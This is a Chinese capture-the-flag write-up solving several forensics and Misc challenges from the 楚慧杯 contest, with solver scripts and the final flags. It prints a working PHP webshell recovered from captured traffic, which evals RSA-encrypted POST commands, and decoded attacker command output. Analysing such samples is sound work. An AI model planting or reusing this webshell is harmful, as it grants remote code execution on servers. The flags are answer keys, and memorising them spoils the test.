楚慧杯Misc—复现

gza_CrackerCrack_me

追踪tcp流量

找到字典

保存字典，上流量一把梭

base64解密

特殊流量2

一把梭出个www.zip

打开，是个RSA

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfhiyoPdM6svJZ+QlYywklwVcx
PkExXQDSdke4BVYMX8Hfohbssy4G7Cc3HwLvzZVDaeyTDaw+l8qILYezVtxmUePQ
5qKi7yN6zGVMUpQsV6kFs0GQVkrJWWcNh7nF6uJxuV+re4j+t2tKF3NhnyOtbd1J
RAcfJSQCvaw6O8uq3wIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {$cmd .= $de;}
}
foreach($_POST as $k => $v){if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {$_POST[$k]=$de;}
}
eval($cmd);

公钥

回到一把梭，发现ZmxhZ的flag头

直接用内置的base64解密

flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.126.139  netmask 255.255.255.0  broadcast 192.168.126.255inet6 fe80::2440:7aed:48c2:9f1c  prefixlen 64  scopeid 0x20<link>ether 00:0c:29:24:00:8d  txqueuelen 1000  (Ethernet)RX packets 152907  bytes 33360002 (31.8 MiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 204935  bytes 100905582 (96.2 MiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 1860  bytes 545117 (532.3 KiB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1860  bytes 545117 (532.3 KiB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 00fa99
/opt/lampp/htdocs/uploads
718a30

搞公钥

替换公钥

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCfhiyoPdM6svJZ+QlYywklwVcxPkExXQDSdke4
BVYMX8Hfohbssy4G7Cc3HwLvzZVDaeyTDaw+l8qILYezVtxmUePQ5qKi7yN6zGVMUpQsV6kFs0GQV
krJWWcNh7nF6uJxuV+re4j+t2tKF3NhnyOtbd1JRAcfJSQCvaw6O8uq3wIDAQAB

再一把梭

发现U2，疑似AES

脚本爆破

import itertools
input_string = "xx34d619x1brxgd9mgd4xzxwxytv669w"
replace_chars = 'i7x'
indexes_of_x = [i for i, char in enumerate(input_string) if char == 'x']
replacement_combinations = itertools.product(replace_chars, repeat=len(indexes_of_x))
with open('a.txt', 'w') as output_file:
for combination in replacement_combinations:# Apply the combination to the original string
temp_list = list(input_string)
for idx, replacement in zip(indexes_of_x, combination):
temp_list[idx] = replacement
# Generate the final string
output_string = ''.join(temp_list)
# Write to the file
output_file.write(output_string + '\n')
print("All possible results have been written to a.txt")

拿字典用B神工具一把梭

得到 i734d619i1brigd9mgd4xz7w7ytv669w 和DeltaAlphaSierraCharlieTangoFoxtrotThreeFoxtrotDeltaThreeFourBravoFiveNineDash FourEchoNineDeltaDashFourThreeNineZeroDashNineTwoSevenBravoDashOneThree FourSixDeltaFiveThreeSixFourDeltaNineNine

拿去解AES得到flag 3fd34b59-4e9d-4390-927b-1346d5364d99

不良劫

对图片进行foremost发现⼆维码，但被污染

方法一：ps曲线处理3到4次，换上左上角的定位符，可扫
方法二：stegsolve先处理一下，然后window画图手动处理

另一半盲水印

拼接得DASCTF{014c6e74-0c4a-48fa-8b33-ced16f847e39}

PixMatrix

(flag.jpg)^T => (PixMatrix.jpg)

   flag.jpg                                       PixMatrix.jpg1 1 1 1 2 2 2 2                                  1 1 1 1 3 3 3 3
1 1 1 1 2 2 2 2                                  1 1 1 1 3 3 3 3
1 1 1 1 2 2 2 2                                  1 1 1 1 3 3 3 3
1 1 1 1 2 2 2 2                                  1 1 1 1 3 3 3 3
3 3 3 3 4 4 4 4                                  2 2 2 2 4 4 4 4
3 3 3 3 4 4 4 4                                  2 2 2 2 4 4 4 4
3 3 3 3 4 4 4 4                                  2 2 2 2 4 4 4 4
3 3 3 3 4 4 4 4                                  2 2 2 2 4 4 4 4

这⾥进行了⼀个8x8矩阵的转置操作，分析图片大小512x72可知，图片可以被分为8x8⼀组的矩阵进行置换

from PIL import Image
def divide(image_route):
picture = Image.open(image_route)
horizontal_span, vertical_span = picture.size
# 初始化⼀个列表，⽤于存储所有的 8x8 块
tiles = []
# 遍历图⽚，按 8x8 的块分割
for y_coordinate in range(0, vertical_span, 8):  # 按⾏遍历for x_coordinate in range(0, horizontal_span, 8):  # 按列遍历# 裁剪当前的 8x8 块tile = picture.crop((x_coordinate, y_coordinate, x_coordinate + 8,y_coordinate + 8))tiles.append(tile)return tiles, picture.sizedef separate(tile):sub_tiles = [tile.crop((0, 0, 4, 4)),  # 左上tile.crop((4, 0, 8, 4)),  # 右上tile.crop((0, 4, 4, 8)),  # 左下tile.crop((4, 4, 8, 8))  # 右下]return sub_tilesdef interchange(sub_tiles):sub_tiles[1], sub_tiles[2] = sub_tiles[2], sub_tiles[1]return sub_tilesdef combine(sub_tiles):new_tile = Image.new("RGB", (8, 8))new_tile.paste(sub_tiles[0], (0, 0))  # 左上new_tile.paste(sub_tiles[1], (4, 0))  # 右上new_tile.paste(sub_tiles[2], (0, 4))  # 左下new_tile.paste(sub_tiles[3], (4, 4))  # 右下return new_tiledef manipulate(image_route, output_route):tiles, original_dimensions = divide_photo_into_8x8_tiles(image_route)processed_tiles = []for tile in tiles:sub_tiles = separate_8x8_into_4x4(tile)sub_tiles = interchange_upper_right_lower_left(sub_tiles)new_tile = combine_4x4_into_8x8(sub_tiles)processed_tiles.append(new_tile)store_processed_image(processed_tiles, original_dimensions,output_route)def store(tiles, original_dimensions, output_route):# 将处理后的块重新组合成图⽚new_picture = Image.new("RGB", original_dimensions)tile_counter = 0for y_coordinate in range(0, original_dimensions[1], 8):for x_coordinate in range(0, original_dimensions[0], 8):new_picture.paste(tiles[tile_counter], (x_coordinate,y_coordinate))tile_counter += 1# 保存结果new_picture.save(output_route)image = "PixMatrix.jpg"
output = "flag.jpg"
manipulate_image(image, output)
print(f"处理完成，结果已保存到 {output}")

马赛克

from(落雨师傅）
AXIOM，搜索flag，发现flag.zip

还发现了个password.txt和readme.txt

全部用MemprocFS提取⼀下

文件损毁了

找到打乱txt

直接打开打乱.txt，没东西，010打开之后才发现加密了。 010打开拿到这个

f = open('./flag.zip','rb').read() n = open('./new.zip','wb') L=len(f) for i in range(int(L/10)):n.write(f[5*i:5*i+5]) n.write(f[L-5*i-5:L-5*i])

脚本修复

def extract_flag_data(enc_file_path, dec_file_path):with open(enc_file_path, 'rb') as encrypted_file:
encrypted_data = encrypted_file.read()
data_length = len(encrypted_data)
flag_bytes = bytearray(data_length)
for idx in range(data_length // 10):
start_flag_pos = 5 * idx
start_encrypted_pos = 10 * idx
flag_bytes[start_flag_pos:start_flag_pos + 5] =
encrypted_data[start_encrypted_pos:start_encrypted_pos + 5]
end_flag_start_pos = data_length - 5 * idx - 5
end_flag_end_pos = data_length - 5 * idx
flag_bytes[end_flag_start_pos:end_flag_end_pos] = encrypted_data[start_encrypted_pos + 5:start_encrypted_pos + 10]
with open(dec_file_path, 'wb') as decrypted_file:
decrypted_file.write(flag_bytes)
print("output is here", dec_file_path)
enc_file_path = './flag.zip'
dec_file_path = './flag1.zip'
extract_flag_data(enc_file_path, dec_file_path)

修复成功 但是要密码

藏起来了？看看之前提取出来的password⽂件 发现密码被模糊了

用你强大的眼睛去瞪出来或者https://github.com/spipm/Depix这个工具去一下模糊

得到密码 ILIKEFORENSICS

解压后打开txt得到

REFTQ1RGe2RlYmVmMTBjLTA1YmItNGVhNy04ZDAxLWE1ZmRmMmEyNDZiN30-